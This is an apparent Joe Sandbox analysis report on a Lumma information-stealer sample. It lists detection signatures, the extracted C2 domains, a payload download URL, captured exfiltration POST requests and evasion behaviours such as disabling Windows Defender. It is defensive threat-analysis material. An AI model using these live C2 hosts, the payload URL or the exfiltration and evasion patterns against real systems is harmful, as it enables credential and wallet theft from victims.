Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543096
MD5:4f0ec9b4a92f1fd134607802eae25e8d
SHA1:769dd5f80e8ffd3ac61a644a23406d25ab8c1d8b
SHA256:19bd761990c86d5b2ec8776e31874449845bc0a38cc137f65739fea6d0adadc9
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4F0EC9B4A92F1FD134607802EAE25E8D)
    • AU963ROPSBOYUMXP3FF.exe (PID: 2552 cmdline: "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe" MD5: 241D9C9E1DF8F28851CBC0421AA56E70)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "necklacedmny.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7160JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7160JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7160, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe", ProcessId: 2552, ProcessName: AU963ROPSBOYUMXP3FF.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-27T08:52:12.279651+010020546531A Network Trojan was detected192.168.2.749700104.21.95.91443TCP
          2024-10-27T08:52:13.820846+010020546531A Network Trojan was detected192.168.2.749702104.21.95.91443TCP
          2024-10-27T08:52:25.586225+010020546531A Network Trojan was detected192.168.2.749763104.21.95.91443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-27T08:52:12.279651+010020498361A Network Trojan was detected192.168.2.749700104.21.95.91443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-27T08:52:13.820846+010020498121A Network Trojan was detected192.168.2.749702104.21.95.91443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-27T08:52:26.520349+010020197142Potentially Bad Traffic192.168.2.749769185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-27T08:52:15.253097+010020480941Malware Command and Control Activity Detected192.168.2.749703104.21.95.91443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Found malware configuration
          Source: file.exe.7160.6.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "necklacedmny.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
          Multi AV Scanner detection for domain / URL
          Source: crisiwarny.storeVirustotal: Detection: 13%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Sample uses string decryption to hide its real strings
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: scriptyprefej.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: navygenerayk.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: founpiuer.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: necklacedmny.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: thumbystriw.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: fadehairucw.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: crisiwarny.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: presticitpo.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: presticitpo.store
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: - Screen Resoluton:
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: Workgroup: -
          Source: 00000006.00000002.1507666347.0000000000741000.00000040.00000001.01000000.00000004.sdmpString decryptor: 4SD0y4--legendaryy
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.7:49763 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: AU963ROPSBOYUMXP3FF.exe, 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmp, AU963ROPSBOYUMXP3FF.exe, 0000000A.00000003.1519965590.00000000055E0000.00000004.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.95.91:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 104.21.95.91:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.95.91:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 104.21.95.91:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.95.91:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49763 -> 104.21.95.91:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: fadehairucw.store
          Source: Malware configuration extractorURLs: navygenerayk.store
          Source: Malware configuration extractorURLs: crisiwarny.store
          Source: Malware configuration extractorURLs: scriptyprefej.store
          Source: Malware configuration extractorURLs: necklacedmny.store
          Source: Malware configuration extractorURLs: founpiuer.store
          Source: Malware configuration extractorURLs: presticitpo.store
          Source: Malware configuration extractorURLs: thumbystriw.store
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 27 Oct 2024 07:52:26 GMTContent-Type: application/octet-streamContent-Length: 2798080Last-Modified: Sun, 27 Oct 2024 07:37:46 GMTConnection: keep-aliveETag: "671dedca-2ab200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 4d 58 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 67 66 66 76 78 79 79 00 60 2a 00 00 a0 00 00 00 52 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 78 78 7a 6a 6a 6c 6c 00 20 00 00 00 00 2b 00 00 04 00 00 00 8c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 90 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 104.21.95.91 104.21.95.91
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49769 -> 185.215.113.16:80
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12849Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585126Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: global trafficDNS traffic detected: DNS query: presticitpo.store
          Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
          Source: file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
          Source: file.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509038620.0000000000FFA000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509561682.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.0000000001291000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509191410.0000000001291000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe.
          Source: file.exe, 00000006.00000003.1507177296.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509561682.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe8T
          Source: file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/sOc
          Source: file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/xOX
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000006.00000003.1507177296.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
          Source: file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
